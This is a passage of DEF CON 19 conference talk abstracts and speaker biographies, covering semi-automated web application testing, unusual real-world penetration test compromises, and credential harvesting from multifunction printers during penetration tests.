There is certainly no shortage of vulnerabilities in modern web environments but we should be looking beyond low hanging fruit at this point. In between fully automated scanners and manual testing lies a sweet spot for the identification of vulnerabilities. Some of the juiciest pieces of information are not found by vulnerability scanners but are found by humans creating custom tests. This is why semi-automated testing space is so important. All of this complicated blending of protection mechanisms, services, and RIA technologies means that moving in to the area of semi-automated testing can be fraught with failure. We detail how these failures can be avoided as well as provide a tool that solves some of these problems as well as provides analysis for your own tools and scripts. Your web applications have moved on, don't you think it's time your tools to do the same?



Nathan Hamiel is a Principal Consultant for FishNet Security's Application Security Practice. He is also an Associate Professor of Software Engineering at the University of Advancing Technology. He spends most of his time focusing in the areas of application, Web 2.0, and enterprise security. Nathan has been a speaker at security events around the world including: Black Hat, DefCon, ShmooCon, ToorCon, SecTor, OWASP and many others. He is also a developer of several open source security projects including the pywebfuzz and RAFT.



Gregory Fleischer is a Senior Security Consultant in the Application Security practice at FishNet Security. In his spare time, he likes to find and exploit vulnerabilities in web browsers and client-side technologies such as Java and Flash. He has an interest in privacy and anonymity and has worked with The Tor Project to identify potential issues.



Justin Engler is a Security Consultant for FishNet Security's Application Security practice. His focus is on the security of web applications, web-backed thick clients (desktop and mobile), databases, and industrial control systems. Justin is currently working on the open source RAFT project.



Seth Law Seth Law is a Principal Consultant for FishNet Security in Application Security. He spends the majority of his time breaking web and mobile applications, but has been known to code when the need arises. Seth is currently involved in multiple open source projects, including RAFT.

Twitter: @sethlaw

return to top

Earth vs. The Giant Spider: Amazingly True Stories of Real Penetration Tests

Earth vs. The Giant Spider: Amazingly True Stories of Real Penetration Tests brings the DEF CON 19 audience the most massive collection of weird, downright bizarre, freaky, and altogether unlikely hacks ever seen in the wild. This talk will focus on those complex hacks found in real environments — some in very high end and important systems, that are unlikely but true. Through stories and demonstrations we will take the audience into a bizarre world where odd business logic flaws get you almost free food [including home shipping], sourcing traffic from port 0 allows ownership of the finances a nation, and security systems are used to hack organizations.



The SpiderLabs team delivered more than 2300 penetration tests last year, giving us access to a huge variety of systems and services, we've collected a compendium of coolest and oddest compromises from the previous year to present at DEF CON. Our goal is to show effective attacks and at the same time not the trivial ones that can be found by automated methods. By the end of this presentation we hope to have the audience thinking differently about systems and applications that organizations use every day, and how they may be used against them.



Rob Havelt is the director of penetration testing at Trustwave's SpiderLabs, the advanced security team within Trustwave focused on forensics, ethical hacking, and application security testing for premier clients. Rob has worked with offensive security seemingly forever, and from running a start-up ISP, to working as a TSCM specialist, he's held just about every job possible in the realm of system administration and information security.



Formerly a bourbon-fueled absurdist, raconteur, and man about town, currently a sardonic workaholic occasionally seeking meaning in the finer things in life — Rob is, and will always be, a career hacker.



Wendel Guglielmetti Henrique is a Security Consultant at Trustwave's SpiderLabs, the advanced security team within Trustwave focused on forensics, ethical hacking, and application security testing for premier clients. He has over 11 years experience in Information Technology, where the last 6 years were dedicated to penetration testing. He has performed security focused code reviews, secure development training, forensics analysis and security assessments. Wendel has performed countless network, application and web application penetration tests for various organizations across the globe, including government, banking, commercial sectors, as well as the payment card industry.



Recent presentations include Black Hat Arsenal 2010 (USA), OWASP AppSec Research 2010 (Sweden) and Black Hat Europe 2010 (Spain). Previously, Wendel spoke in Troopers 09 (Germany), OWASP AppSecEU09 (Poland), YSTS 3.0 (Brazil), and has spoken in well known security conferences such as DEF CON 16 (USA) and H2HC (Brazil).



Wendel developed a tool to detect and remove the famous BugBear virus, before most of the antivirus companies around the world in 2002. During his career, he has discovered vulnerabilities across a diverse set of technologies including webmail systems, wireless access points, remote access systems, web application firewalls, IP cameras, and IP telephony applications. Some tools he wrote already were used as examples in national magazines like PCWorld Brazil and international ones like Hakin9 Magazine.

return to top

From Printer To Pwnd: Leveraging Multifunction Printers During Penetration Testing

In this presentation we go beyond the common printer issues and focus on harvesting data from multifunction printer (MFP) that can be leveraged to gain access to other core network systems. By taking advantage of poor printer security and vulnerabilities during penetration testing we are able to harvest a wealth of information from MFP devices including usernames, email addresses, and authentication information including SMB, Email, LDAP passwords. Leveraging this information we have successful gained administrative access into core systems including email servers, file servers and Active directory domains on multiple occasions. We will also explore MFP device vulnerabilities including authentication bypass, information leakage flaws. Tying this altogether we will discuss the development of an automated process for harvesting the information from MFP devices with the updated release of our tool 'PRAEDA'.



Deral Heiland CISSP, serves as a Senior Security Engineer where he is responsible for security assessments, and consulting for corporations and government agencies. In addition, Deral is the founder of Layered Defense Research a group of security professionals responsible for discovering and publishing multiple vulnerabilities. Deral is also co-founder and president of Ohio Information Security Forum a not for profit organization that focuses on information security training and education. Deral has also presented at numerous conferences including ShmooCon, DEF CON, AFCEA InfoTech, Ohio Digital Government Summit , Univ